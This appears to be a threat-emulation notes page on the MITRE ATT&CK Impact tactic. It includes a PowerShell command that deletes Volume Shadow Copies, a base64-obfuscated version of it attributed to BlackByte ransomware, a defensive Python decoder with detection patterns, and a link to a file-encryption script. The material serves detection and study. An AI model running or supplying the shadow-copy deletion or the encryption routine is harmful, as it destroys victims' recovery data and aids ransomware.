Impact

The adversary is trying to manipulate, interrupt, or destroy your systems and data. https://attack.mitre.org/tactics/TA0040/

Remove Volume Shadow Copies

Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}

This TTP is associated with BlackByte, which runs the command above as a base64-encoded UTF-16LE string: the blob is split into concatenated fragments, decoded at runtime with [System.Convert]::FromBase64String, and executed via Invoke-Expression.

powershell.exe $x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x
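The following is an added example, not code from the original page or from BlackByte tooling: a small Python triage helper of the kind an analyst would run over process-creation logs to recover what an encoded PowerShell command line actually does, without executing it. It reassembles the quoted fragments passed to FromBase64String (mirroring the fact that .NET's FromBase64String ignores whitespace), decodes the result as UTF-16LE the way [System.Text.Encoding]::Unicode.GetString does, and matches the plaintext against shadow-copy deletion indicators. It goes beyond the page's inline FromBase64String form to also handle the -EncodedCommand flag. The sample command line is the one from the page; the indicator list, the encode helper and all function names are assumptions made for this example.

```python
"""Triage helper for encoded PowerShell command lines (added example, not from the page)."""
import base64
import re
from typing import Optional

# Constructed sample: the BlackByte-style command line from the page, with the base64 split
# across single-quoted fragments joined by '+' (string-concatenation obfuscation).
SAMPLE_CMDLINE = (
    "powershell.exe $x = [System.Text.Encoding]::Unicode.GetString("
    "[System.Convert]::FromBase64String('RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg'"
    "+'AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC'"
    "+'AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA'"
    "+'F8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA=='));Invoke-Expression $x"
)

# Constructed indicator list (assumption: these are the shadow-copy / recovery-inhibition
# commands a detection for this TTP would look for; all are listed under MITRE T1490).
SHADOW_COPY_INDICATORS = {
    "win32_shadowcopy": r"win32_shadowcopy.*\.delete\(",
    "vssadmin_delete_shadows": r"vssadmin(?:\.exe)?\s+delete\s+shadows",
    "wmic_shadowcopy_delete": r"wmic(?:\.exe)?\s+shadowcopy\s+delete",
    "wbadmin_delete_catalog": r"wbadmin(?:\.exe)?\s+delete\s+catalog",
}

# Two common ways an encoded payload reaches powershell.exe:
#  1. -EncodedCommand (or an unambiguous prefix such as -e, -ec, -en, -enc) followed by base64
#  2. an inline [Convert]::FromBase64String('...'+'...') whose result is Invoke-Expression'd
ENC_FLAG_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
FROM_B64_RE = re.compile(r"FromBase64String\(([^)]*)\)", re.IGNORECASE)
QUOTED_RE = re.compile(r"""["']([^"']*)["']""")


def encode_command(command: str) -> str:
    """Encode a command the way -EncodedCommand expects: UTF-16LE bytes, then base64."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def extract_base64_payload(cmdline: str) -> Optional[str]:
    """Pull the base64 blob out of a logged command line, reassembling split fragments."""
    m = ENC_FLAG_RE.search(cmdline)
    if m:
        return m.group(1)
    m = FROM_B64_RE.search(cmdline)
    if not m:
        return None
    fragments = QUOTED_RE.findall(m.group(1))
    if not fragments:
        return None  # argument is a variable or expression we cannot resolve statically
    # .NET's FromBase64String ignores whitespace, so strip it here as well.
    return re.sub(r"\s+", "", "".join(fragments))


def decode_payload(b64: str) -> str:
    """Decode a payload as PowerShell would: base64 -> UTF-16LE text."""
    raw = base64.b64decode(b64)
    return raw.decode("utf-16-le", errors="replace")


def triage(cmdline: str) -> dict:
    """Decode the encoded command (if any) and match it against the indicator list."""
    payload = extract_base64_payload(cmdline)
    decoded = decode_payload(payload) if payload else None
    text = decoded if decoded is not None else cmdline  # unencoded command lines are checked too
    hits = [name for name, pat in SHADOW_COPY_INDICATORS.items() if re.search(pat, text, re.IGNORECASE)]
    return {"encoded": payload is not None, "decoded": decoded, "indicators": hits}


if __name__ == "__main__":
    result = triage(SAMPLE_CMDLINE)
    print("decoded   :", result["decoded"])
    print("indicators:", result["indicators"])
    # Re-encoding the recovered plaintext reproduces the page's blob, fragments joined.
    print("round-trip:", encode_command(result["decoded"]) == extract_base64_payload(SAMPLE_CMDLINE))
```

Running the block decodes the page's blob back to the Get-WmiObject Win32_Shadowcopy one-liner and flags it on the win32_shadowcopy indicator. Matching on the decoded text rather than the raw command line is the point: the fragment concatenation defeats any rule that looks for the base64 of the whole command, and a rule on the raw line never sees the word Shadowcopy at all.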

PowerShell Encryption Routine

A trivial example of encrypting files recursively, using a random integer as the key:

https://github.com/burmat/burmatscripts/blob/master/powershell/AES-Locker.ps1
